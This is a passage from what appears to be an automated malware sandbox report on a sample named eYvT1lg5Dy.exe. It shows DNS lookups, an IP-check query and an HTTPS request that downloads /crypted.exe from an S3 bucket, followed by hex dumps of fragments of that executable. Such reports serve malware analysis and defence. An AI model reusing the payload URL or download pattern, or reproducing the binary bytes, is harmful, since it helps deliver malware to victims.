                                                                                                                                                                                        Sep 25, 2021 10:17:09.569423914 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:09.582917929 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:09.602706909 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.551632881 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:18.573545933 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.582453966 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:18.602396011 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:27.993978977 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:28.013684034 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:28.635018110 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:28.656613111 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:29.532562971 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:29.552484989 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:30.216706991 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:30.236444950 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:31.015336037 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:31.035273075 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:31.990437031 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:32.025130987 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:32.233239889 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:32.252932072 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:33.022066116 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:33.041932106 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:33.860085964 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:33.879784107 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:34.652348042 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:34.672307014 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:35.126029015 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:35.147265911 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:44.054528952 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:17:44.076057911 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:18:04.063167095 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:18:04.088907957 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:18:19.182080030 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:18:19.220206976 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:18:20.554737091 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                                                        Sep 25, 2021 10:18:20.575695992 CEST53633078.8.8.8192.168.2.6

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                        Sep 25, 2021 10:17:09.548855066 CEST192.168.2.68.8.8.80x195dStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:09.582917929 CEST192.168.2.68.8.8.80x486aStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:18.551632881 CEST192.168.2.68.8.8.80x5c39Standard query (0)cli-4576347563476534786.s3.us-east-2.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:18.582453966 CEST192.168.2.68.8.8.80x20c2Standard query (0)cli-4576347563476534786.s3.us-east-2.amazonaws.comA (IP address)IN (0x0001)

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                        Sep 25, 2021 10:17:09.569423914 CEST8.8.8.8192.168.2.60x195dNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:09.602706909 CEST8.8.8.8192.168.2.60x486aNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:18.573545933 CEST8.8.8.8192.168.2.60x5c39No error (0)cli-4576347563476534786.s3.us-east-2.amazonaws.coms3-r-w.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:18.573545933 CEST8.8.8.8192.168.2.60x5c39No error (0)s3-r-w.us-east-2.amazonaws.com52.219.104.152A (IP address)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:18.602396011 CEST8.8.8.8192.168.2.60x20c2No error (0)cli-4576347563476534786.s3.us-east-2.amazonaws.coms3-r-w.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Sep 25, 2021 10:17:18.602396011 CEST8.8.8.8192.168.2.60x20c2No error (0)s3-r-w.us-east-2.amazonaws.com52.219.104.152A (IP address)IN (0x0001)

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • cli-4576347563476534786.s3.us-east-2.amazonaws.com

                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.2.64974152.219.104.152443C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2021-09-25 08:17:19 UTC0OUTGET /crypted.exe HTTP/1.1
                                                                                                                                                                                        Host: cli-4576347563476534786.s3.us-east-2.amazonaws.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2021-09-25 08:17:19 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                        x-amz-id-2: nE4T6NS6ItDtwRt9YZ+RrsN63nzysp1hzYR/IC91b3KtSjWvhPJbCa9nHunQUayIrsCJu6PigEY=
                                                                                                                                                                                        x-amz-request-id: G3WXJJ2R56XYBKBD
                                                                                                                                                                                        Date: Sat, 25 Sep 2021 08:17:20 GMT
                                                                                                                                                                                        Last-Modified: Fri, 24 Sep 2021 22:06:55 GMT
                                                                                                                                                                                        ETag: "d508b954a785bdb77fdeffcd4c56f8e5"
                                                                                                                                                                                        x-amz-version-id: h8r.j4SDmc.A_8yNCUeqwlqq0.xjCJlX
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                        Content-Length: 293376
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2021-09-25 08:17:19 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 22 be 17 de 66 df 79 8d 66 df 79 8d 66 df 79 8d 09 a9 d2 8d 4d df 79 8d 09 a9 e7 8d 76 df 79 8d 09 a9 d3 8d 00 df 79 8d 6f a7 ea 8d 65 df 79 8d 66 df 78 8d 1a df 79 8d 09 a9 d6 8d 67 df 79 8d 09 a9 e3 8d 67 df 79 8d 09 a9 e4 8d 67 df 79 8d 52 69 63 68 66 df 79 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 14 0c 9b 5f 00 00 00 00 00 00 00 00 e0 00 02
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$"fyfyfyMyvyyoeyfxygygygyRichfyPEL_
                                                                                                                                                                                        2021-09-25 08:17:19 UTC16INData Raw: 48 0c 83 c9 20 8b 55 f8 89 4a 0c 83 c8 ff e9 c5 01 00 00 8b 45 f8 8b 48 0c 83 c9 02 8b 55 f8 89 4a 0c 8b 45 f8 8b 48 0c 83 e1 ef 8b 55 f8 89 4a 0c 8b 45 f8 c7 40 04 00 00 00 00 c7 45 fc 00 00 00 00 8b 4d fc 89 4d f4 8b 55 f8 8b 42 0c 25 0c 01 00 00 75 36 e8 c6 2c 00 00 83 c0 20 39 45 f8 74 0d e8 b9 2c 00 00 83 c0 40 39 45 f8 75 10 8b 4d f0 51 e8 d8 90 00 00 83 c4 04 85 c0 75 0c 8b 55 f8 52 e8 f8 8f 00 00 83 c4 04 8b 45 f8 8b 48 0c 81 e1 08 01 00 00 0f 84 f9 00 00 00 8b 55 f8 8b 45 f8 8b 0a 2b 48 08 79 21 68 d8 c4 41 00 6a 00 68 a0 00 00 00 68 58 c5 41 00 6a 02 e8 0e 03 00 00 83 c4 14 83 f8 01 75 01 cc 8b 45 f8 8b 4d f8 8b 10 2b 51 08 89 55 fc 8b 45 f8 8b 48 08 83 c1 01 8b 55 f8 89 0a 8b 45 f8 8b 48 18 83 e9 01 8b 55 f8 89 4a 04 83 7d fc 00 7e 1c 8b 45 fc
                                                                                                                                                                                        Data Ascii: H UJEHUJEHUJE@EMMUB%u6, 9Et,@9EuMQuUREHUE+Hy!hAjhhXAjuEM+QUEHUEHUJ}~E
                                                                                                                                                                                        2021-09-25 08:17:19 UTC17INData Raw: 00 00 00 8b e5 5d c3 cc cc cc cc cc cc 8b ff 55 8b ec 6a 01 68 17 04 00 c0 6a 02 e8 1d 00 00 00 83 c4 0c 68 17 04 00 c0 ff 15 04 b1 41 00 50 ff 15 00 b1 41 00 5d c3 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 38 03 00 00 a1 88 41 42 00 33 c5 89 45 f0 83 7d 08 ff 74 0c 8b 45 08 50 e8 3c 58 00 00 83 c4 04 c7 85 c8 fc ff ff 00 00 00 00 6a 4c 6a 00 8d 8d cc fc ff ff 51 e8 ef 17 00 00 83 c4 0c 8d 95 c8 fc ff ff 89 55 f8 8d 85 20 fd ff ff 89 45 fc c7 45 f4 00 00 00 00 c7 85 1c fd ff ff 00 00 00 00 89 85 d0 fd ff ff 89 8d cc fd ff ff 89 95 c8 fd ff ff 89 9d c4 fd ff ff 89 b5 c0 fd ff ff 89 bd bc fd ff ff 66 8c 95 e8 fd ff ff 66 8c 8d dc fd ff ff 66 8c 9d b8 fd ff ff 66 8c 85 b4 fd ff ff 66 8c a5 b0 fd ff ff 66 8c ad ac fd ff ff 9c 8f 85 e0 fd ff ff c7 85 20 fd ff ff
                                                                                                                                                                                        Data Ascii: ]UjhjhAPA]U8AB3E}tEP<XjLjQU EEffffff
                                                                                                                                                                                        2021-09-25 08:17:19 UTC33INData Raw: 8b ec 83 ec 14 8b 45 18 c7 00 00 00 00 00 8b 4d 14 c7 01 01 00 00 00 8b 55 08 89 55 fc 83 7d 0c 00 74 11 8b 45 0c 8b 4d 10 89 08 8b 55 0c 83 c2 04 89 55 0c c7 45 f8 00 00 00 00 8b 45 fc 0f be 08 83 f9 22 75 1f 33 d2 83 7d f8 00 0f 94 c2 89 55 f8 8b 45 fc 8a 08 88 4d f3 8b 55 fc 83 c2 01 89 55 fc eb 77 8b 45 18 8b 08 83 c1 01 8b 55 18 89 0a 83 7d 10 00 74 13 8b 45 10 8b 4d fc 8a 11 88 10 8b 45 10 83 c0 01 89 45 10 8b 4d fc 8a 11 88 55 f3 8b 45 fc 83 c0 01 89 45 fc 0f b6 4d f3 51 e8 47 89 00 00 83 c4 04 85 c0 74 2f 8b 55 18 8b 02 83 c0 01 8b 4d 18 89 01 83 7d 10 00 74 13 8b 55 10 8b 45 fc 8a 08 88 0a 8b 55 10 83 c2 01 89 55 10 8b 45 fc 83 c0 01 89 45 fc 0f b6 4d f3 85 c9 74 20 83 7d f8 00 0f 85 4d ff ff ff 0f b6 55 f3 83 fa 20 74 0d 0f b6 45 f3 83 f8 09 0f
                                                                                                                                                                                        Data Ascii: EMUU}tEMUUEE"u3}UEMUUwEU}tEMEEMUEEMQGt/UM}tUEUUEEMt }MU tE
                                                                                                                                                                                        2021-09-25 08:17:19 UTC34INData Raw: 55 f8 52 ff 15 40 b1 41 00 33 c0 eb 44 6a 00 6a 00 8b 45 fc 50 8b 4d ec 51 8b 55 f0 52 8b 45 f8 50 6a 00 6a 00 ff 15 44 b1 41 00 85 c0 75 15 6a 02 8b 4d ec 51 e8 b3 98 ff ff 83 c4 08 c7 45 ec 00 00 00 00 8b 55 f8 52 ff 15 40 b1 41 00 8b 45 ec 8b e5 5d c3 cc cc cc cc cc cc cc cc 8b ff 56 be d4 24 42 00 8b c6 3d d4 24 42 00 73 13 8b 06 85 c0 74 02 ff d0 83 c6 04 81 fe d4 24 42 00 72 ed 5e c3 cc cc cc cc cc cc cc cc cc cc 8b ff 56 be dc 24 42 00 8b c6 3d dc 24 42 00 73 13 8b 06 85 c0 74 02 ff d0 83 c6 04 81 fe dc 24 42 00 72 ed 5e c3 cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a 00 ff 15 d8 b0 41 00 5d c3 cc 8b ff 55 8b ec ff 15 4c b1 41 00 5d c2 04 00 cc 8b ff 55 8b ec 51 a1 64 44 42 00 50 ff 15 0c b0 41 00 89 45 fc 83 7d fc 00 75 20 8b 0d ec 49 43 00 51
                                                                                                                                                                                        Data Ascii: UR@A3DjjEPMQUREPjjDAujMQEUR@AE]V$B=$Bst$Br^V$B=$Bst$Br^UjA]ULA]UQdDBPAE}u ICQ
                                                                                                                                                                                        2021-09-25 08:17:19 UTC49INData Raw: 01 74 19 8b 4d 10 51 8b 55 0c 52 8b 45 08 50 e8 86 00 00 00 83 c4 0c 89 45 e4 eb 3f e8 d9 71 ff ff c7 00 09 00 00 00 e8 fe 71 ff ff c7 00 00 00 00 00 c7 45 e4 ff ff ff ff 33 c9 75 1e 68 18 ea 41 00 6a 00 6a 4f 68 c8 eb 41 00 6a 02 e8 d8 7e ff ff 83 c4 14 83 f8 01 75 01 cc c7 45 fc fe ff ff ff e8 02 00 00 00 eb 0d 8b 45 08 50 e8 88 78 00 00 83 c4 04 c3 8b 45 e4 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec b8 90 3c 00 00 e8 21 25 00 00 a1 88 41 42 00 33 c5 89 45 bc c7 45 e8 00 00 00 00 c7 45 e4 00 00 00 00 c7 45 fc 00 00 00 00 8b 45 fc 89 45 ec 83 7d 10 00 75 07 33 c0 e9 f1 0a 00 00 33 c9 83 7d 0c 00 0f 95 c1 89 4d e0 83 7d e0 00 75 1e 68 a0 ec 41 00 6a 00 6a 6d 68 c8 eb 41 00 6a 02 e8 28
                                                                                                                                                                                        Data Ascii: tMQUREPE?qqE3uhAjjOhAj~uEEPxEMdY_^[]U<!%AB3EEEEEE}u33}M}uhAjjmhAj(
                                                                                                                                                                                        2021-09-25 08:17:19 UTC51INData Raw: 00 8b 55 ec 83 c2 01 89 55 ec 8b 45 fc 83 c0 01 89 45 fc eb 0e ff 15 74 b0 41 00 89 45 f4 e9 97 00 00 00 e9 8d 00 00 00 0f be 4d fb 83 f9 01 74 09 0f be 55 fb 83 fa 02 75 7b 0f b7 45 c0 50 e8 49 73 00 00 83 c4 04 0f b7 c8 0f b7 55 c0 3b ca 75 0b 8b 45 fc 83 c0 02 89 45 fc eb 0b ff 15 74 b0 41 00 89 45 f4 eb 52 83 7d b0 00 74 47 c7 45 c8 01 00 00 00 b9 0d 00 00 00 66 89 4d c0 0f b7 55 c0 52 e8 05 73 00 00 83 c4 04 0f b7 c0 0f b7 4d c0 3b c1 75 14 8b 55 fc 83 c2 01 89 55 fc 8b 45 ec 83 c0 01 89 45 ec eb 0b ff 15 74 b0 41 00 89 45 f4 eb 05 e9 74 fc ff ff e9 dc 04 00 00 8b 4d 08 c1 f9 05 8b 55 08 83 e2 1f c1 e2 06 8b 04 8d 40 7b b7 02 0f be 4c 10 04 81 e1 80 00 00 00 0f 84 6b 04 00 00 c7 45 f4 00 00 00 00 0f be 55 fb 85 d2 0f 85 3f 01 00 00 c7 85 ac eb ff ff
                                                                                                                                                                                        Data Ascii: UUEEtAEMtUu{EPIsU;uEEtAER}tGEfMURsM;uUUEEtAEtMU@{LkEU?
                                                                                                                                                                                        2021-09-25 08:17:19 UTC67INData Raw: 45 f4 8b 48 08 89 0a 8b 55 f4 c7 42 04 00 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc 8b ff 55 8b ec 6a 01 e8 14 00 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 88 28 42 00 68 00 49 40 00 64 a1 00 00 00 00 50 83 c4 ec 53 56 57 a1 88 41 42 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 c7 45 e4 00 00 00 00 c7 45 dc 00 00 00 00 6a 01 e8 49 8a ff ff 83 c4 04 c7 45 fc 00 00 00 00 c7 45 e0 00 00 00 00 eb 09 8b 45 e0 83 c0 01 89 45 e0 8b 4d e0 3b 0d 60 8c b7 02 0f 8d f4 00 00 00 8b 55 e0 a1 40 7c b7 02 83 3c 90 00 0f 84 dd 00 00 00 8b 4d e0 8b 15 40 7c b7 02 8b 04 8a 8b 48 0c 81 e1 83 00 00 00 0f 84 c2 00 00 00 8b 55 e0 a1 40 7c b7 02 8b 0c 90 51 8b 55 e0 52 e8 dc 63 ff ff 83 c4 08 c7 45 fc 01 00 00 00 8b 45 e0 8b
                                                                                                                                                                                        Data Ascii: EHUBE]Uj]Ujh(BhI@dPSVWAB1E3PEdEEjIEEEEM;`U@|<M@|HU@|QURcEE
                                                                                                                                                                                        2021-09-25 08:17:19 UTC68INData Raw: 00 6a 00 6a 13 68 a8 fb 41 00 68 c4 fe 41 00 68 68 fb 41 00 e8 94 33 ff ff 83 c4 14 b8 16 00 00 00 e9 87 01 00 00 8b 4d 08 89 4d fc 8b 55 0c 89 55 f8 8b 45 fc 8b 4d 10 8a 11 88 10 8b 45 fc 0f be 08 8b 55 fc 83 c2 01 89 55 fc 8b 45 10 83 c0 01 89 45 10 85 c9 74 0d 8b 4d f8 83 e9 01 89 4d f8 74 02 eb cd 83 7d f8 00 0f 85 cf 00 00 00 8b 55 08 c6 02 00 83 7d 0c ff 74 49 81 7d 0c ff ff ff 7f 74 40 83 7d 0c 01 76 3a 8b 45 0c 83 e8 01 39 05 08 40 42 00 73 0b 8b 0d 08 40 42 00 89 4d e0 eb 09 8b 55 0c 83 ea 01 89 55 e0 8b 45 e0 50 68 fe 00 00 00 8b 4d 08 83 c1 01 51 e8 ac 4b ff ff 83 c4 0c ba 40 fb 41 00 85 d2 74 0d 33 c0 74 09 c7 45 dc 01 00 00 00 eb 07 c7 45 dc 00 00 00 00 8b 4d dc 89 4d ec 83 7d ec 00 75 1e 68 04 fb 41 00 6a 00 6a 1e 68 a8 fb 41 00 6a 02 e8 8b
                                                                                                                                                                                        Data Ascii: jjhAhAhhA3MMUUEMEUUEEtMMt}U}tI}t@}v:E9@Bs@BMUUEPhMQK@At3tEEMM}uhAjjhAj
                                                                                                                                                                                        2021-09-25 08:17:19 UTC84INData Raw: 10 52 8b 45 0c 50 e8 62 03 00 00 83 c4 08 89 45 10 8d 4d f0 51 6a 00 8b 55 10 52 8b 45 08 50 8b 4d 10 51 8b 55 0c 52 6a 00 8d 4d e0 e8 cc e1 fe ff 8b 00 8b 48 04 51 ff 15 44 b1 41 00 89 45 fc 83 7d fc 00 74 33 83 7d f0 00 75 2d 8b 55 08 03 55 fc 0f be 42 ff 85 c0 75 09 8b 4d fc 83 e9 01 89 4d fc 8b 55 fc 89 55 b8 8d 4d e0 e8 5c e1 fe ff 8b 45 b8 e9 e3 02 00 00 e8 df e7 fe ff c7 00 2a 00 00 00 c7 45 b4 ff ff ff ff 8d 4d e0 e8 3a e1 fe ff 8b 45 b4 e9 c1 02 00 00 e9 c3 01 00 00 8d 45 f0 50 6a 00 8b 4d 10 51 8b 55 08 52 6a ff 8b 45 0c 50 6a 00 8d 4d e0 e8 3f e1 fe ff 8b 08 8b 51 04 52 ff 15 44 b1 41 00 89 45 fc 83 7d fc 00 74 1f 83 7d f0 00 75 19 8b 45 fc 83 e8 01 89 45 b0 8d 4d e0 e8 e3 e0 fe ff 8b 45 b0 e9 6a 02 00 00 83 7d f0 00 75 0b ff 15 74 b0 41 00 83
                                                                                                                                                                                        Data Ascii: REPbEMQjUREPMQURjMHQDAE}t3}u-UUBuMMUUM\E*EM:EEPjMQURjEPjM?QRDAE}t}uEEMEj}utA
                                                                                                                                                                                        2021-09-25 08:17:19 UTC85INData Raw: 01 00 00 00 8b 45 e4 89 45 f0 83 7d f0 00 75 21 68 90 10 42 00 6a 00 68 40 01 00 00 68 c8 0f 42 00 6a 02 e8 65 f1 fe ff 83 c4 14 83 f8 01 75 01 cc 83 7d f0 00 75 33 e8 21 e4 fe ff c7 00 16 00 00 00 6a 00 68 40 01 00 00 68 c8 0f 42 00 68 74 10 42 00 68 90 10 42 00 e8 50 ef fe ff 83 c4 14 b8 16 00 00 00 e9 85 02 00 00 83 7d 0c 00 74 55 8b 55 0c c6 02 00 83 7d 10 ff 74 49 81 7d 10 ff ff ff 7f 74 40 83 7d 10 01 76 3a 8b 45 10 83 e8 01 39 05 08 40 42 00 73 0b 8b 0d 08 40 42 00 89 4d e0 eb 09 8b 55 10 83 ea 01 89 55 e0 8b 45 e0 50 68 fe 00 00 00 8b 4d 0c 83 c1 01 51 e8 ab 07 ff ff 83 c4 0c 83 7d 08 00 74 09 8b 55 08 c7 02 00 00 00 00 8b 45 18 3b 45 10 76 08 8b 4d 10 89 4d dc eb 06 8b 55 18 89 55 dc 8b 45 dc 89 45 f8 b9 ff ff ff 7f 3b 4d f8 1b d2 83 c2 01 89 55
                                                                                                                                                                                        Data Ascii: EE}u!hBjh@hBjeu}u3!jh@hBhtBhBP}tUU}tI}t@}v:E9@Bs@BMUUEPhMQ}tUE;EvMMUUEE;MU
                                                                                                                                                                                        2021-09-25 08:17:19 UTC101INData Raw: 02 05 01 00 00 75 31 6a 00 ff 15 64 b0 41 00 6a 00 6a 00 ff 15 98 b0 41 00 68 f4 1f 42 00 68 30 20 42 00 68 40 20 42 00 ff 15 b4 b0 41 00 6a 00 6a 00 ff 15 94 b0 41 00 eb a6 c7 85 68 ef ff ff 00 00 00 00 eb 0f 8b 95 68 ef ff ff 83 c2 01 89 95 68 ef ff ff 81 bd 68 ef ff ff bc 5f 0e 00 7d 7e 81 3d 00 7b b7 02 e2 09 00 00 75 2d 6a 00 6a 00 68 78 20 42 00 68 20 21 42 00 6a 00 ff 15 c0 b0 41 00 6a 00 ff 15 20 b0 41 00 8d 85 28 ee ff ff 50 6a 00 ff 15 a4 b0 41 00 81 bd 68 ef ff ff 22 3b 00 00 75 0c 8b 0d 44 48 43 00 89 0d 04 7b b7 02 81 3d 00 7b b7 02 b5 0d 00 00 75 1c 6a 00 6a 00 6a 00 6a 00 ff 15 40 b0 41 00 ff 15 38 b0 41 00 6a 00 ff 15 c8 b0 41 00 e9 67 ff ff ff c7 85 24 ee ff ff 00 00 00 00 eb 0f 8b 95 24 ee ff ff 83 c2 01 89 95 24 ee ff ff 8b 85 24 ee ff
                                                                                                                                                                                        Data Ascii: u1jdAjjAhBh0 Bh@ BAjjAhhhh_}~={u-jjhx Bh !BjAj A(PjAh";uDHC{={ujjjj@A8AjAg$$$$
                                                                                                                                                                                        2021-09-25 08:17:19 UTC102INData Raw: 00 4e 2e 02 00 60 2e 02 00 76 2e 02 00 8c 2e 02 00 9c 2e 02 00 a8 2e 02 00 b8 2e 02 00 d0 2e 02 00 e2 2e 02 00 f4 2e 02 00 04 2f 02 00 14 2f 02 00 30 2f 02 00 40 2f 02 00 58 2f 02 00 6a 2f 02 00 7e 2f 02 00 96 2f 02 00 a6 2f 02 00 b4 2f 02 00 d2 2f 02 00 ec 2f 02 00 f8 2f 02 00 08 30 02 00 16 30 02 00 26 30 02 00 40 30 02 00 54 30 02 00 74 30 02 00 8a 30 02 00 9e 30 02 00 aa 30 02 00 c4 30 02 00 d8 30 02 00 e8 30 02 00 f6 30 02 00 0e 31 02 00 36 31 02 00 46 31 02 00 56 31 02 00 68 31 02 00 7e 31 02 00 90 31 02 00 a0 31 02 00 b0 31 02 00 c8 31 02 00 dc 31 02 00 ea 31 02 00 fe 31 02 00 12 32 02 00 2e 32 02 00 4c 32 02 00 60 32 02 00 78 32 02 00 8a 32 02 00 b2 32 02 00 c0 32 02 00 d8 32 02 00 f2 32 02 00 02 33 02 00 18 33 02 00 2e 33 02 00 48 33 02 00 5e 33
                                                                                                                                                                                        Data Ascii: N.`.v........//0/@/X/j/~///////00&0@0T0t00000000161F1V1h1~111111112.2L2`2x22222233.3H3^3
                                                                                                                                                                                        2021-09-25 08:17:19 UTC118INData Raw: 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 29 00 00 00 25 73 28 25 64 29 20 3a 20 25 73 00 00 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5c 00 6e 00 22 00 29 00 00 00 0d 00 00 00 00 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5c 00 72 00 22 00 29 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00
                                                                                                                                                                                        Data Ascii: zLineMessage)%s(%d) : %sstrcat_s(szLineMessage, 4096, "\n")strcat_s(szLineMessage, 4096, "\r")strcat_s(szLineMessage, 4096,
                                                                                                                                                                                        2021-09-25 08:17:19 UTC119INData Raw: 63 74 65 72 73 20 69 6e 20 53 74 72 69 6e 67 00 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 32 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5f 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 3a 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 63 00 68 00 61 00 72 00 61 00 63 00 74 00 65 00 72 00 73 00 20 00 69 00 6e 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 22 00 29 00 00 00 77 00 63 00 73 00 74 00 6f 00 6d 00 62 00 73 00 5f 00 73 00 28 00 28 00 28 00 76 00 6f 00 69 00 64 00 20 00 2a 00 29 00 30 00
                                                                                                                                                                                        Data Ascii: cters in Stringstrcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")wcstombs_s(((void *)0
